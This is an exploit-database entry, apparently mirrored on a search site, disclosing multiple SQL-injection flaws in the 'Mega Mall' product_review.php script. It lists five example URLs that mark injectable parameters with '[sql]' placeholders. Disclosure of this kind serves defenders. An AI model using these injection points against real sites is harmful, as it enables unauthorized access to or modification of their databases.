Lucene search

K
exploitdbLaurent gaffieEDB-ID:29026
HistoryNov 14, 2006 - 12:00 a.m.

Mega Mall - 'product_review.php' Multiple SQL Injections

2006-11-1400:00:00
laurent gaffie
www.exploit-db.com
11

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/21072/info

Megamail is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

http://example.com/mega-mall/product_review.php?t=[sql]
http://example.com/mega-mall/product_review.php?t=0&productId=[sql]
http://example.com/mega-mall/product_review.php?t=0&productId=1004&sk=[sql]
http://example.com/mega-mall/product_review.php?t=0&productId=1004&t=0&x=[sql]
http://example.com/mega-mall/product_review.php?t=0&productId=1004&sk=USERID&so=[sql]

AI Score

7.4

Confidence

Low

Related for EDB-ID:29026